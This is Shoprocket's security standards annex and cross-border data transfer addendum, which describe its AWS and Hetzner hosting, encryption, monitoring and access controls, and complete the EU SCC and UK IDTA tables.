Shoprocket is a cloud-based application whose infrastructure and associated data are hosted on servers operated by the cloud service providers (1) Amazon Web Services (“ AWS”) in data centres located in the AWS eu-west-region 1 in Ireland and (2) Hetzner Online (“ Hetzner Online”) in data centres located in Falkenstein, Germany.  This means that the Shoprocket Service is delivered via the internet according to a as Software as a Service ( “Saas”) model.  

As of between AWS and Hetzner Online, AWS hosts the Shoprocket application, its platform, infrastructure and portins associated data, and provides the computing power that allows you to access the Services without the need to physically install a copy of Shoprocket’s e-commerce software. For its part, Hetzner Online provides Shoprocket with a dedicated server on which Shoprocket stores certain data associated with the Services, including principally image, digital downloads, log and invoice data. 

The SaaS model establishes a division of labour with regard to implementing the technical and organisational safeguards needed to protect the Personal Data. As the data controller, Shoprocket is responsible for designing the access management tools and network security tools according to which Personal Data is stored in the cloud - security in the cloud. As cloud service providers and data processors, AWS and Hetzner Online are responsible as applicable for maintaining the security of the underlying cloud environment and physical servers in which the Personal Data in stored, including implementing technical and physical measures to protect against unauthorised access of its data centres and network architecture- security of the cloud.

In more detailed terms, this means that Shoprocket is responsible for managing the security of the Shoprocket application software (including updates and security patches to the Shoprocket application software), as well as the configuration of any security-related features that AWS and Hetzner Online provide as part of their cloud service offerings. In turn, AWS and Hetzner Online operate, manage and control (as applicable) the components from the Shoprocket application system and virtualization layer down to the physical security of the facilities in which the Shoprocket application service operates and its associated data is stored. 

We call this a ‘Shared Responsibility Model,’ as it means that in addition to implementing substantial technical and organisational measures of our own, we rely on the extensive security mechanisms of AWS and Hetzner Online. 

Further information on how AWS implements this ‘Shared Responsibility Model’ can be found here, details of the technical and organisational measures AWS implements are located here, and particulars of the physical measures AWS deploys to protect its data centres are provided here

Further information on the physical, network and system security measures that Hetzner Online deploys to safeguard its data centres and the data stored within them can be found here

  1. AWS and Hetzner Online Servers 

AWS 

According to Article 28(3)(c) UK GDPR, Shoprocket is required to choose a cloud computing processor that provides sufficient guarantees of its ability to meet the data security measures outlined in Article 32 UK GDPR.

We have selected AWS to be our principal hosting provider, infrastructure partner and cloud computing processor on the basis of a careful selection process, taking into account legal, organisation and technical measures. We chose AWS because their IT architecture and infrastructure has been certified as being designed and managed in accordance with industry-leading best practises and security standards including: 

  • SOC 1/SSAE 16/ISAE 3402; 
  • SOC 2;
  • SOC 3;
  • FISMA, DIACAP, and FedRAMP; 
  • DOD CSM Levels 1-5; 
  • PCI DSS Level 1; 
  • ISO 9001/ISO 27001/ISO 27017/ISO 27018; 
  • ITAR;
  • FIPS 140-2;
  • MTCS Level 3; 
  • HITRUST. 

AWS provides a wide range of information regarding its IT control environment and security measures to customers through white papers, reports, certifications, accreditations and other third-party audits. For more information, see AWS Compliance.

To best ensure that data cannot be used, disclosed or transferred without authorisation, we have technically and contractually restricted the AWS availability regions in which our Personal Data can be stored to those in the EU/EEA and have regulated access options accordingly. 

Hetzner Online

Shoprocket has chosen Hetzner Online as a reliable partner to provide it with additional dedicated server space. Hetzner Online is certified in accordance with DIN ISO/IEC 27001 standards. Furthermore, the internationally recognised standard for information security certifies that Hetzner Online has established and implemented an appropriate Information Security Management System ( “ISMS”). 

Hetzner Online utilises the ISMS in its infrastructure and operations at both German data centre locations in which Shoprocket leases dedicated server space, namely the Nuremberg and Falkenstein data centre parks. FOX certification, a third-party certification authority, has audited and certified Hetzner Online’s data centre parks’ ISMS processes.  

  1. Design, Integrity and Availability of Shoprocket Application

The Shoprocket application has been developed using a JavaScript framework and runs on a cloud-deployed MySQL database client hosted on Amazon’s Relational Database Service ( “Amazon RDS”). As Shoprocket is hosted entirely in the cloud, this means that Shoprocket is primarily a serverless environment, and operates according to the ‘Shared Responsibility Model’ outlined above whereby it is Amazon RDS that is responsible for operating the routers, load balancers, DNS servers and physical servers that support the Shoprocket application. 

Shoprocket has chosen to host its MySQL database client on Amazon RDS due to the documented performance, availability and data security levels it offers. Amazon RDS’ underlying computing power means that input/output requests can be managed by the MySQL database at a speed of 40,000 IOs per second, while AWS’ scalable servers automatically balance and distribute load balance and network traffic to the Shoprocket application across multiple EEA availability zones to ensure the deployment of application is stable regardless of usage levels.

In the event of any substantial interruption of service or data loss, Amazon RDS enables Shoprocket’s MySQL database to be recovered to any point within a period of thirty-five days. Shoprocket similarly maintains daily backups of the Shoprocket application and its related data stores on the Amazon SW3 storage service. Backups are stored in a different AWS availability region than the primary data storage location to ensure backups are accessible in the event of a technical or physical compromise to the eu-west-1 region. 

Similarly, Shoprocket stores back-ups of certain application data on dedicated server space leased from Hetzneer Online. Security updates are continuously performed by Hetzner Online on its dedicated servers, and there is a central back-up server to save back-up data from the dedicated server. Similarly, the RAID-1 hard disk system utilised on the dedicated servers reduces the likelihood of data loss. 

In designing and coding the Shoprocket application, Shoprocket has taken into account research as to common vulnerabilities in web applications, including for instance reviewing the Shoprocket application against the Top Ten list of common application vulnerabilities published by the Open Web Application Security Project ( “OWASP”) each year. 

Shoprocket has notably designed the application to neutralise the risk of cross-site scripting ( “XSS”), a vulnerability that has been identified on a number of major e-Commerce applications that use JavaScript frameworks, and which has been used to orchestrate denial of service attacks and payment card theft. A custom sensitization and filtering function has been built into the application’s source code so as to separate client-side and server-side data, and prevent an unauthorised user input being set without prior validation to the application without prior validation or encoding. The Shoprocket application similarly integrates with an external JQuery library that provides a sanitization function on all server-side data inputted to application. 

Shoprocket engages a specialist third-party security tester to review its source code for any vulnerabilities, and to perform an annual penetration test of its application and infrastructure. Shoprocket further employs a third-party application vulnerability scanning service. 

  1. Encryption 

An essential core element of Shoprocket’s security measures is encryption of data both in rest and in transit. All external network communication between customers and the Shoprocket application over public networks using Transport Layer Security (“ TLS”) 1.2 or higher. Personal Data stored on Shoprocket’s AWS and Hetzner Online servers are encrypted using AES 256 or higher. 

Shoprocket uses the Amazon AWS key management system ( “AWS KMS”) and Hetzner’s Online full-disk encryption service to encrypt Personal Data. 

The AWS KMS encryption system is designed so that no one, including Shoprocket or AWS staff, can access the plaintext encryption keys. AWS KMS uses hardware security modules ( “HMS”) that have been or are currently validated in accordance with FIPS 140-2 to protect the conflict of the plaintext keys used to encrypt the Personal Data. All cryptographic keys are automatically rotated once a year. 

Hetzner Online’s full-disk encryption uses AES 256 encryption algorithms and mandatory authentication processes to encrypt all software and hardware-based drives that are stored on its dedicated servers. This minimises the risk of data loss and unauthorised access to Personal Data. 

Shoprocket’s systems uses transport encryption whenever data needs to be transferred over an insecure or public network. The web-interface and all APIs connected to the Shoprocket application are only accessible via HTTPs connections, and client systems must use at least TLS 1.2 to access the Shoprocket system.  

  1. Restriction of server locations to the EEA/EU 

Shoprocket stores data exclusively in the EEA, namely at AWS’ data centres in Ireland and Hetzner Online’s data centres in Germany. 

This is to best ensure that customer data cannot be used or disclosed without authorisation, particularly in light of the European Court of Justice’s Schrems II judgement of 16 July 2020, and data protection experts’ concerns regarding the advent of data surrender laws in the United States and other non-EEA justifications.

  1. Availability Zones

Whether hosted on AWS or Hetzner Online, all front-end and back-end systems operated by Shoprocket are redundant and distributed across multiple availability zones in the EEA. This ensures that if one availability zone fails, the Shoprocket application can continue to operate without restriction. 

Each availability zone is connected to several internet service providers and is supplied by several power circuits. They are interconnected via high-speed links so that applications distributed across multiple zones can use LAN connections to communicate between zones. This enables optimal performance of all systems used by the Shoprocket application. 

  1. Intrusion detection 

Shoprocket uses an intrusion detection system ( “IDS”) that monitors security-related events in Shoprocket’s systems. The IDS monitors: 

  • Log files for unusual or unknown entries; 
  • Changes to systems files (file integrity monitoring) as well as AWS’ own configuration; 
  • All login attempts as well as changes in user rights within the systems;
  • Changes in the device file system and the loaded kernel modules to detect the connection of unauthorised hardware; 
  • Network traffic: 
    • Known exploits an rootkits 
    • Spoofing 
  • All changes to the IDS itself including restarts or failures; 
  • API events triggered by users with AWS account environments; 
  • Unused services or users on the respective systems; 
  • Changes in used (network) ports. 

If security-related anomalies are detected on a system, they are automatically reported to the relevant Shoprocket staff, who then perform a manual check of the anomaly. Particularly critical anomalies, such as where a rootkits is detected, are automatically prevented. Furthermore, the IDS supports a security policy enforcement that meets the requirements of PCI DSS 3.0.  

  1. Logging/Audit Trail 

Shoprocket uses logging in its AWS environments for several areas. These include: 

  • System events; 
  • Error logging; 
  • User activity; 
  • Logins and requests to database systems; 
  • Other security-related events/audit logging. 

By using AWS Cloudtrail, Shoprocket has the ability to record all events within the cloud environments used, thereby not only creating transparent user and resource activity, but also providing a high level of transparency for forensic analysis of potential security incidents. The information collected by AWS Cloudtrail is analysed by to detect anomalies in a timely manner. 

  1. Monitoring 

Shoprocket uses various monitoring tools to ensure maximum availability and performance of the Shoprocket systems and application. These monitor at least the following parameters: 

Availability

  • Accessibility of the application; 
  • Accessibility of backend systems and services; 

Resources 

  • CPU utilisation 
  • Utilisation of network interfaces 
  • Utilisation of persistent and volatile interfaces 

Performance 

  • Application response times 
  • Response times of back-end systems
  • Query times for MySQL database contents. 

Security 

  • IDS performance 
  • Update status of systems. 

Monitoring 

  • Error logs; 
  • Access logs. 

In addition to this automated monitoring, Shoprocket employees monitor relevant online media and blogs (including the OWASP updated referenced above) in order to be able to react to them promptly. 

  1. Security audits and penetration tests. 

Shoprocket conducts both internal and external security tests at relevant intervals. In addition the security of the Shoprocket application is regularly checked for possible vulnerabilities by an external provider. Furthermore, internal audits are also carried out by the Shoprocket staff in which not only the technical, but also the organisational measures within the company are examined for effectiveness. 

  1. Change Management 

Shoprocket stores the associated code for each configuration of its system and software in repositories of a version management system to make changes traceable in terms of time and content. Before changes are imported into the operating environment, they are tested in a staging environment that is identical to the operating environment. 

  1. Access Control

Shoprocket assigns its employees and contractors with different levels of access control for its systems and services on AWS and Hetzner Online’s servers. These are managed through AWS’ and Hetzner Online’s respective Identity and Access Management (IAM) systems, which enable a fine granulation of access to different services. 

The overriding principle for Shoprocket when assigning rights to its personnel is “need-to-know.” In practice, this means that Shoprocket staff are only given access to those functions they need to perform their jobs. Access to bank-end systems is only possible via secure and authenticated connections. Public release of back-end systems is prohibited. Only a strictly limited number of Shoprocket personnel have access to the system that stores customer data. This direct access is exclusively for error analysis and is monitored.  

Annex B

Cross-Border Transfers

PART 1 – ex-EEA Transfers

1. Annex I.A of the Standard Contractual Clauses shall be completed as follows:

Data Exporter:  You (As detailed in the Agreement). 

Contact details: Your contact details (As detailed in the Agreement).

Data Exporter Role: Data Controller.

  1. Module One:  The Data Importer is a Data Controller.
  2. Module Two: The Data Importer is a Data Controller.

Module Two: The Data Exporter is a Data Controller.

Signature and Date: By entering into the Agreement and DPA, Data Exporter is deemed to have signed these Standard Contractual Clauses incorporated herein, including their Annexes, as of the Effective Date of the Agreement.

Data Importer: Shoprocket. 

Contact details: As detailed in the Agreement. 

Data Importer Role:  

  1. Module One:  The Data Importer is a Data Controller (Module One relates to Client Account Data and Client Usage Date). 
  2. Module Two: The Data Importer is a Data Processor (Module One relates to all Personal Data except for the Client Account Data and Client Usage Data). 

Signature and Date: By entering into the Agreement and DPA, Data Importer is deemed to have signed these Standard Contractual Clauses, incorporated herein, including their Annexes, as of the Effective Date of the Agreement.  

2. Annex I.B of the Standard Contractual Clauses shall be completed as follows:

The categories of data subjects are described in clause 4.6 of the Addendum. 

The categories of Personal Data are described in clause 4.5 of the Addendum. 

The Parties do not intend for Special Category Data to be transferred.

The frequency of the transfer is a continuous basis for the duration of the Agreement.

The nature of the processing is described in clause 4.4 of the Addendum. 

The purpose of the processing is described in clause 4.3 of the Addendum. 

The period for which the Personal Data will be retained is for the duration of the Agreement, unless agreed otherwise in the Agreement and/or the DPA.

In relation to transfers to Sub-processors, the subject matter, nature, and duration of the processing is set forth  in clause 9 of the Addendum. 

3. Annex I.C of the Standard Contractual Clauses shall be completed as follows: 

The competent Supervisory Authority in accordance with Clause 13 is the supervisory authority in the Member State stipulated in clause 10(e) of this Addendum. 

The  Shoprocket Security Standards (Annex A) shall serve as the documentation and particulars required in Annex II of the Standard Contractual Clauses.

4. To the extent there is any conflict between the Standard Contractual Clauses and any other terms in this DPA or the Agreement, the provisions of the Standard Contractual Clauses will prevail.

PART 2 – ex- UK Transfers

1. The parties agree that the IDTA Addendum shall apply to an ex-UK Transfer and this Part 2 is effective from 21 March 2022.

2. Unless defined in the Agreement, defined terms Part 2 of Annex 2 shall have the meaning in  “Part: 2 Mandatory Clauses” below. 

Part 1: Tables

Table 1 of the IDTA Addendum

3. Table 1 of the Addendum shall be completed as follows:

  • Data Exporter: You (As detailed in the Agreement). 
  • Contact details: As detailed in the Agreement.

Signature and Date: By entering into the Agreement and the Addendum, Data Exporter is deemed to have signed this IDTA Addendum incorporated herein, as of the Effective Date of the Agreement.

  • Data Importer: Shoprocket. 
  • Contact details: As detailed in the Agreement.

Signature and Date: By entering into the Agreement and DPA, Data Importer is deemed to have signed this IDTA Addendum, incorporated herein, as of the Effective Date of the Agreement.

Table 2 of the IDTA Addendum

4.Table 2 of theIDTA Addendumshall be completed as follows:

Addendum EU SCCs The Approved EU SCCs, including the Appendix Information and with only the following modules, clauses or optional provisions of the Approved EU SCCs brought into effect for the purposes of this Addendum:
Module in operation Clause 7 (Docking Clause) Clause 11 (Option) Clause 9a (Prior Authorisation or General Authorisation) Clause 9a (Time period) Is personal data received from the Importer combined with personal data collected by the Exporter?
1 Shall not apply Shall not apply General Authorisation As set out in clause 9.2 of the Addendum (30 days).   No
2 Shall not apply Shall not apply General Authorisation As set out in clause 9.2 of the Addendum (30 days).   No

Table 3 of the   IDTA Addendum

5. Annex IA shall be completed as follows:

Data Exporter:  You (As detailed in the Agreement). 

Contact details: Your contact details (As detailed in the Agreement).

Data Exporter Role: Data Controller.

  1. Module One:  The Data Importer is a Data Controller.
  2. Module Two: The Data Importer is a Data Controller.

Module Two: The Data Exporter is a Data Controller.

Signature and Date: By entering into the Agreement and DPA, Data Exporter is deemed to have signed the Approved EU SCCs, incorporated herein, including their Annexes, as of the Effective Date of the Agreement.

Data Importer: Shoprocket. 

Contact details: As detailed in the Agreement. 

Data Importer Role:  

  1. Module One:  The Data Importer is a Data Controller (Module One relates to Client Account Data and Client Usage Date). 
  2. Module Two: The Data Importer is a Data Processor (Module One relates to all Personal Data except for the Client Account Data and Client Usage Data). 

6. Annex I.B shall be completed as follows:

The categories of data subjects are described in clause 4.6 of the Addendum. 

The categories of Personal Data are described in clause 4.5 of the Addendum. 

The Parties do not intend for Special Category Data to be transferred.

The frequency of the transfer is a continuous basis for the duration of the Agreement.

The nature of the processing is described in clause 4.4 of the Addendum. 

The purpose of the processing is described in clause 4.3 of the Addendum. 

The period for which the Personal Data will be retained is for the duration of the Agreement, unless agreed otherwise in the Agreement and/or the DPA.

In relation to transfers to Sub-processors, the subject matter, nature, and duration of the processing is set forth  in clause 9 of the Addendum. 

Annex III: List of Sub-processors shall not apply as Shoprocket has a general written authorisation to use Sub-processors.

Table 4 of the IDTA Addendum

7. The Importer may end this IDTA Addendum as set out in the clause 26 of this IDTA Addendum.  

Part 2: Mandatory Clauses

8. Each Party agrees to be bound by the terms and conditions set out in this IDTA Addendum, in exchange for the other Party also agreeing to be bound by this IDTA Addendum.

9. Although Annex 1A and Clause 7 of the Approved EU SCCs require signature by the Parties, for the purpose of making Restricted Transfers, the Parties may enter into this IDTA Addendum in any way that makes them legally binding on the Parties and allows data subjects to enforce their rights as set out in this Addendum. Entering into this IDTA Addendum will have the same effect as signing the Approved EU SCCs and any part of the Approved EU SCCs.

Interpretation of this IDTA Addendum 

10. Where this IDTA Addendum uses terms that are defined in the Approved EU SCCs those terms shall have the same meaning as in the Approved EU SCCs. In addition, the following terms have the following meanings:

Addendum This International Data Transfer Addendum which is made up of this IDTA Addendum incorporating the Addendum EU SCCs.
Addendum EU SCCs The version(s) of the Approved EU SCCs which this IDTA Addendum is appended to, as set out in Table 2, including the Appendix Information.
Appendix Information As set out in Table ‎3.
Appropriate Safeguards The standard of protection over the Personal Data and of Data Subjects’ rights, which is required by UK Data Protection Laws when you are making a Restricted Transfer relying on standard data protection clauses under Article 46(2)(d) UK GDPR.
Approved Addendum The template Addendum issued by the UK ICO and laid before UK Parliament in accordance with s119A of the Data Protection Act 2018 on 2 February 2022, as it is revised under clause 25 below. .
Approved EU SCCs The Standard Contractual Clauses set out in the Annex of Commission Implementing Decision (EU) 2021/914 of 4 June 2021.
ICO The UK Information Commissioner.
Restricted Transfer A transfer which is covered by Chapter V of the UK GDPR.
UK The United Kingdom of Great Britain and Northern Ireland.
UK Data Protection Laws All laws relating to data protection, the processing of personal data, privacy and/or electronic communications in force from time to time in the UK, including the UK GDPR and the Data Protection Act 2018.
UK GDPR As defined in section 3 of the Data Protection Act 2018.

11. This IDTA Addendum must always be interpreted in a manner that is consistent with UK Data Protection Laws and so that it fulfils the Parties’ obligation to provide the Appropriate Safeguards. 

12. If the provisions included in the Addendum EU SCCs amend the Approved SCCs in any way which is not permitted under the Approved EU SCCs or the Approved Addendum, such amendment(s) will not be incorporated in this IDTA Addendum and the equivalent provision of the Approved EU SCCs will take their place.

13. If there is any inconsistency or conflict between UK Data Protection Laws and this IDTA Addendum, UK Data Protection Laws applies.

14. If the meaning of this IDTA Addendum is unclear or there is more than one meaning, the meaning which most closely aligns with UK Data Protection Laws applies. 

15.  Any references to legislation (or specific provisions of legislation) means that legislation (or specific provision) as it may change over time. This includes where that legislation (or specific provision) has been consolidated, re-enacted and/or replaced after this IDTA Addendum has been entered into. 

Hierarchy

16. Although Clause 5 of the Approved EU SCCs sets out that the Approved EU SCCs prevail over all related agreements between the parties, the parties agree that, for Restricted Transfers, the hierarchy in Section ‎17 will prevail.

17. Where there is any inconsistency or conflict between the Approved Addendum and the Addendum EU SCCs (as applicable), the Approved Addendum overrides the Addendum EU SCCs, except where (and in so far as) the inconsistent or conflicting terms of the Addendum EU SCCs provides greater protection for data subjects, in which case those terms will override the Approved Addendum.

18. Where this IDTA Addendum incorporates Addendum EU SCCs which have been entered into to protect transfers subject to the General Data Protection Regulation (EU) 2016/679 then the Parties acknowledge that nothing in this IDTA Addendum impacts those Addendum EU SCCs.

Incorporation of and changes to the EU SCCs

19. This IDTA Addendum incorporates the Addendum EU SCCs which are amended to the extent necessary so that:

  1. together they operate for data transfers made by the data exporter to the data importer, to the extent that UK Data Protection Laws apply to the data exporter’s processing when making that data transfer, and they provide Appropriate Safeguards for those data transfers; 
  2. Clauses ‎16 to ‎18 below override Clause 5 (Hierarchy) of the Addendum EU SCCs; and
  3. this IDTA Addendum (including the Addendum EU SCCs incorporated into it) is (1) governed by the laws of England and Wales and (2) any dispute arising from it is resolved by the courts of England and Wales, in each case unless the laws and/or courts of Scotland or Northern Ireland have been expressly selected by the Parties.

20. Unless the Parties have agreed alternative amendments which meet the requirements of the above clause 19, the provisions of Section ‎22 will apply.

21. No amendments to the Approved EU SCCs other than to meet the requirements of Section ‎19 may be made.

22. The following amendments to the Addendum EU SCCs (for the purpose of Section ‎19) are made: 

  1. References to the “Clauses” means the IDTA Addendum, incorporating the Addendum EU SCCs;
  2. In Clause 2, delete the words: “and, with respect to data transfers from controllers to processors and/or processors to processors, standard contractual clauses pursuant to Article 28(7) of Regulation (EU) 2016/679”;
  3. Clause 6 (Description of the transfer(s)) is replaced with: “The details of the transfers(s) and in particular the categories of personal data that are transferred and the purpose(s) for which they are transferred) are those specified in Annex I.B where UK Data Protection Laws apply to the data exporter’s processing when making that transfer.”;
  4. Clause 8.8(i) of Module 2 is replaced with: “the onward transfer is to a country benefitting from adequacy regulations pursuant to Section 17A of the UK GDPR that covers the onward transfer;”
  5. References to “Regulation (EU) 2016/679”, “Regulation (EU) 2016/679 of the European Parliament and of the Council of 27 April 2016 on the protection of natural persons with regard to the processing of personal data and on the free movement of such data (General Data Protection Regulation)” and “that Regulation” are all replaced by “UK Data Protection Laws”. References to specific Article(s) of “Regulation (EU) 2016/679” are replaced with the equivalent Article or Section of UK Data Protection Laws;
  6. References to Regulation (EU) 2018/1725 are removed;
  7. References to the “European Union”, “Union”, “EU”, “EU Member State”, “Member State” and “EU or Member State” are all replaced with the “UK”;
  8. The reference to “Clause 12(c)(i)” at Clause 10(b)(i) of Module one, is replaced with “Clause 11(c)(i)”;
  9. Clause 13(a) and Part C of Annex I are not used; 
  10. The “competent supervisory authority” and “supervisory authority” are both replaced with the “Information Commissioner”;
  11. In Clause 16(e), subsection (i) is replaced with: “the Secretary of State makes regulations pursuant to Section 17A of the Data Protection Act 2018 that cover the transfer of personal data to which these clauses apply;”;
  12. Clause 17 is replaced with: “These Clauses are governed by the laws of England and Wales.”;
  13. Clause 18 is replaced with: “Any dispute arising from these Clauses shall be resolved by the courts of England and Wales. A data subject may also bring legal proceedings against the data exporter and/or data importer before the courts of any country in the UK. The Parties agree to submit themselves to the jurisdiction of such courts.”; and
  14. The footnotes to the Approved EU SCCs do not form part of the IDTA Addendum, except for footnotes 8, 9, 10 and 11. 

Amendments to this IDTA Addendum 

23. The Parties may agree to change Clauses 17 and/or 18 of the Addendum EU SCCs to refer to the laws and/or courts of Scotland or Northern Ireland.

24. If the Parties wish to change the format of the information included in Part 1: Tables of the Approved Addendum, they may do so by agreeing to the change in writing, provided that the change does not reduce the Appropriate Safeguards.

25. From time to time, the ICO may issue a revised Approved Addendum which: 

  1. makes reasonable and proportionate changes to the Approved Addendum, including correcting errors in the Approved Addendum; and/or
  2. reflects changes to UK Data Protection Laws;

The revised Approved Addendum will specify the start date from which the changes to the Approved Addendum are effective and whether the Parties need to review this IDTA Addendum including the Appendix Information. This IDTA Addendum is automatically amended as set out in the revised Approved Addendum from the start date specified. 

26. If the ICO issues a revised Approved Addendum under Section ‎18, if any Party selected in Table 4 “Ending the Addendum when the Approved Addendum changes”, will as a direct result of the changes in the Approved Addendum have a substantial, disproportionate and demonstrable increase in: 

  1. its direct costs of performing its obligations under the Addendum; and/or
  2. its risk under the Addendum, 

and in either case it has first taken reasonable steps to reduce those costs or risks so that it is not substantial and disproportionate, then that Party may end this IDTA Addendum at the end of a reasonable notice period, by providing written notice for that period to the other Party before the start date of the revised Approved Addendum.

27. The Parties do not need the consent of any third party to make changes to this IDTA Addendum, but any changes must be made in accordance with its terms.

as featured in
Trust Pilot rating G2 rating Captera rating